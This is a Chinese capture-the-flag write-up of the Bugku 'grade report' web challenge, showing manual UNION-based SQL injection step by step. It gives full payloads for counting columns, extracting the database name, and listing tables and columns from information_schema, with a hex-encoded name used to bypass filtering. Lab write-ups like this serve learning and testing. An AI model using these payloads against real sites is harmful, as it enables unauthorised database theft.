成绩单（bugku--web）

解法一：手工注入

输入1，2，3分别能查到1，2，3号学生的成绩

SQL注入应该没跑了

输入1’返回异常，输入1’–+返回异常，输入1’ #或者1’-- +返回正常，看来过滤了–+

观察，表貌似有四列（名字，Math，English，Chinese），输入1’ order by 4#返回正常，输入1’ order by 5#返回异常，看来的确是4列

接下来就开始暴库名、表名、字段名

尝试联合查询，记得把前面的查询数据置空，写成id=-1即可，显示正常，说明确确实实存在这四列数据

我们先手遍历一遍 id=-1’ union select 1,2,3,4#

发现有四个表且都有回显

于是就开始**吧
首先爆库名：通过id=-1’ union select 1,2,3,database()#得到数据库名字skctf_flag
然后爆表：通过使用 id=-1’ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#
得到表名：fl4g,sc
接下来我们就要暴字段了
通过id=-1’ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467# //这里需要用16进制绕过得到字段skctf_flag
最后就是查询数据了，通过使用：id=-1’ union select 1,2,3,skctf_flag from fl4g#
想要了解information_schema点击这里

解法二：sqlmap

成绩单（bugku--web）

成绩单 （bugku--web）

解法一：手工注入

解法二：sqlmap

相关推荐

成绩单（bugku--web）